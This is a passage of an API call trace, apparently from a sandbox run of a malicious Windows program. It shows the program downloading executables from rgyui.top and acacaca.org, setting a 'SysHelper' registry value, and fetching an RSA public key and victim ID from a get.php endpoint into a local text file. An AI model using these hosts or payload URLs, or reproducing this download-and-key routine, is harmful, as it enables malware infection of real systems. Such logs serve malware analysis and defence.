dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0098.670] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afe040 [0098.670] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x844) returned 0x2b1ff98 [0098.670] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2afe040, cbMultiByte=-1, lpWideCharStr=0x2b1ff98, cchWideChar=1058 | out: lpWideCharStr="http://rgyui.top/dl/build2.exe") returned 31 [0098.670] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b207e8 [0098.670] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1ff98 | out: hHeap=0x670000) returned 1 [0098.671] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe040 | out: hHeap=0x670000) returned 1 [0098.681] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b33358 [0098.681] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x822) returned 0x2b1ff98 [0098.681] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://rgyui.top/dl/build2.exe", cchWideChar=-1, lpMultiByteStr=0x2b1ff98, cbMultiByte=2082, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://rgyui.top/dl/build2.exe", lpUsedDefaultChar=0x0) returned 31 [0098.681] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b33bb0 [0098.682] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1ff98 | out: hHeap=0x670000) returned 1 [0098.682] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b33358 | out: hHeap=0x670000) returned 1 [0098.682] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://rgyui.top/dl/build2.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0103.054] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b33bb0 | out: hHeap=0x670000) returned 1 [0103.054] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b207e8 | out: hHeap=0x670000) returned 1 [0103.054] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0103.054] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afe200 [0103.054] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x852) returned 0x2b33958 [0103.054] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2afe200, cbMultiByte=-1, lpWideCharStr=0x2b33958, cchWideChar=1065 | out: lpWideCharStr="http://acacaca.org/files/1/build3.exe") returned 38 [0103.054] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x860) returned 0x2b207d0 [0103.055] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b33958 | out: hHeap=0x670000) returned 1 [0103.055] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe200 | out: hHeap=0x670000) returned 1 [0103.055] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x860) returned 0x2b33958 [0103.055] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x829) returned 0x2b75658 [0103.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://acacaca.org/files/1/build3.exe", cchWideChar=-1, lpMultiByteStr=0x2b75658, cbMultiByte=2089, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://acacaca.org/files/1/build3.exe", lpUsedDefaultChar=0x0) returned 38 [0103.055] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x830) returned 0x2b75ee0 [0103.056] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b75658 | out: hHeap=0x670000) returned 1 [0103.056] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b33958 | out: hHeap=0x670000) returned 1 [0103.056] InternetOpenUrlA (hInternet=0xcc0008, lpszUrl="http://acacaca.org/files/1/build3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0010 [0103.831] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b75ee0 | out: hHeap=0x670000) returned 1 [0103.831] HttpQueryInfoW (in: hRequest=0xcc0010, dwInfoLevel=0x20000013, lpBuffer=0x911d6d0, lpdwBufferLength=0x911d710, lpdwIndex=0x0 | out: lpBuffer=0x911d6d0*, lpdwBufferLength=0x911d710*=0x4, lpdwIndex=0x0) returned 1 [0103.832] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b207d0 | out: hHeap=0x670000) returned 1 [0103.832] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b1fb80 | out: hHeap=0x670000) returned 1 [0103.832] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afe008 | out: hHeap=0x670000) returned 1 [0103.832] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b27ad8 | out: hHeap=0x670000) returned 1 [0103.833] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdf98 | out: hHeap=0x670000) returned 1 [0103.833] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdf60 | out: hHeap=0x670000) returned 1 [0103.833] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdeb8 | out: hHeap=0x670000) returned 1 [0103.834] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4200 | out: hHeap=0x670000) returned 1 [0103.834] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b27710 | out: hHeap=0x670000) returned 1 Thread: id = 72 os_tid = 0xf88 [0099.116] timeGetTime () returned 0xf722b1 [0099.152] GetLastError () returned 0x54f [0099.177] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x8, Size=0x3bc) returned 0x2b1f720 [0099.200] GetCurrentThreadId () returned 0xf88 [0099.200] SetLastError (dwErrCode=0x54f) [0099.219] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", ulOptions=0x0, samDesired=0xf003f, phkResult=0xf31a5e4 | out: phkResult=0xf31a5e4*=0x52c) returned 0x0 [0099.219] RegQueryValueExW (in: hKey=0x52c, lpValueName="SysHelper", lpReserved=0x0, lpType=0xf31a5d8, lpData=0xf31a5e0, lpcbData=0xf31a5dc*=0x4 | out: lpType=0xf31a5d8*=0x0, lpData=0xf31a5e0*=0x0, lpcbData=0xf31a5dc*=0x4) returned 0x2 [0099.219] RegSetValueExW (in: hKey=0x52c, lpValueName="SysHelper", Reserved=0x0, dwType=0x4, lpData=0xf31a5e0*=0x1, cbData=0x4 | out: lpData=0xf31a5e0*=0x1) returned 0x0 [0099.220] RegCloseKey (hKey=0x52c) returned 0x0 [0099.226] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xf31a4e4 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0099.226] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0099.260] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x18) returned 0x2aa9338 [0099.291] AreFileApisANSI () returned 1 [0099.291] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf31a4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0099.292] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x64) returned 0x75d470 [0099.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf31a4e4, cbMultiByte=-1, lpWideCharStr=0x75d470, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0099.318] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xf31a368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.318] GetLastError () returned 0x2 [0099.318] GetLastError () returned 0x2 [0099.318] SetLastError (dwErrCode=0x2) [0099.318] GetLastError () returned 0x2 [0099.318] SetLastError (dwErrCode=0x2) [0099.318] GetLastError () returned 0x2 [0099.318] SetLastError (dwErrCode=0x2) [0099.328] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x75d470 | out: hHeap=0x670000) returned 1 [0099.328] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0099.356] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x50) returned 0x2ae4150 [0099.364] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x30) returned 0x2afdfd0 [0099.370] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x840) returned 0x2b32050 [0099.370] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2afdfd0, cbMultiByte=-1, lpWideCharStr=0x2b32050, cchWideChar=1056 | out: lpWideCharStr="248506A379C3838D8B1754B19D2995D3") returned 33 [0099.371] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x850) returned 0x2b32898 [0099.371] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32050 | out: hHeap=0x670000) returned 1 [0099.371] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2afdfd0 | out: hHeap=0x670000) returned 1 [0099.371] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x890) returned 0x2b330f0 [0099.372] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2ae4150 | out: hHeap=0x670000) returned 1 [0099.372] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b32898 | out: hHeap=0x670000) returned 1 [0099.372] lstrcpyW (in: lpString1=0xf31af78, lpString2="http://acacaca.org/test2/get.php?pid=248506A379C3838D8B1754B19D2995D3" | out: lpString1="http://acacaca.org/test2/get.php?pid=248506A379C3838D8B1754B19D2995D3") returned="http://acacaca.org/test2/get.php?pid=248506A379C3838D8B1754B19D2995D3" [0099.372] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php?pid=248506A379C3838D8B1754B19D2995D3", lpString2="&first=true" | out: lpString1="http://acacaca.org/test2/get.php?pid=248506A379C3838D8B1754B19D2995D3&first=true") returned="http://acacaca.org/test2/get.php?pid=248506A379C3838D8B1754B19D2995D3&first=true" [0099.372] InternetOpenUrlW (hInternet=0xcc0010, lpszUrl="http://acacaca.org/test2/get.php?pid=248506A379C3838D8B1754B19D2995D3&first=true", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0100.204] InternetReadFile (in: hFile=0xcc0018, lpBuffer=0xf31a778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xf31a604 | out: lpBuffer=0xf31a778*, lpdwNumberOfBytesRead=0xf31a604*=0x22d) returned 1 [0100.205] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0xf31a670 | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 0x0 [0100.205] PathAppendA (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0100.205] AreFileApisANSI () returned 1 [0100.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf31a670, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0100.205] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x64) returned 0x75da90 [0100.205] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xf31a670, cbMultiByte=-1, lpWideCharStr=0x75da90, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt") returned 50 [0100.205] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0xf31a47c, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2bc [0100.206] GetFileType (hFile=0x2bc) returned 0x1 [0100.207] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x75da90 | out: hHeap=0x670000) returned 1 [0100.207] lstrlenA (lpString="{\"public_key\":\"-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 557 [0100.235] RtlAllocateHeap (HeapHandle=0x670000, Flags=0x0, Size=0x1000) returned 0x2b250d8 [0100.256] WriteFile (in: hFile=0x2bc, lpBuffer=0xf319118*, nNumberOfBytesToWrite=0x22d, lpNumberOfBytesWritten=0xf318a44, lpOverlapped=0x0 | out: lpBuffer=0xf319118*, lpNumberOfBytesWritten=0xf318a44*=0x22d, lpOverlapped=0x0) returned 1 [0100.288] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b250d8 | out: hHeap=0x670000) returned 1 [0100.288] CloseHandle (hObject=0x2bc) returned 1 [0100.290] InternetCloseHandle (hInternet=0xcc0018) returned 1 [0100.292] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0100.292] HeapFree (in: hHeap=0x670000, dwFlags=0x0, lpMem=0x2b330f0 | out: hHeap=0x670000) returned 1 [0100.292] lstrlenA (lpString="{\"public_key\":\"") returned 15 [0100.292] lstrcpyA (in: lpString1=0xf31ab78, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.292] lstrcpyA (in: lpString1=0xf31a778, lpString2="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" | out: lpString1="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}" [0100.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.292] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.293] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n\",\"id\":\"uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt\"}") returned 542 [0100.293] lstrlenA (lpString="-----BEGIN PUBLIC 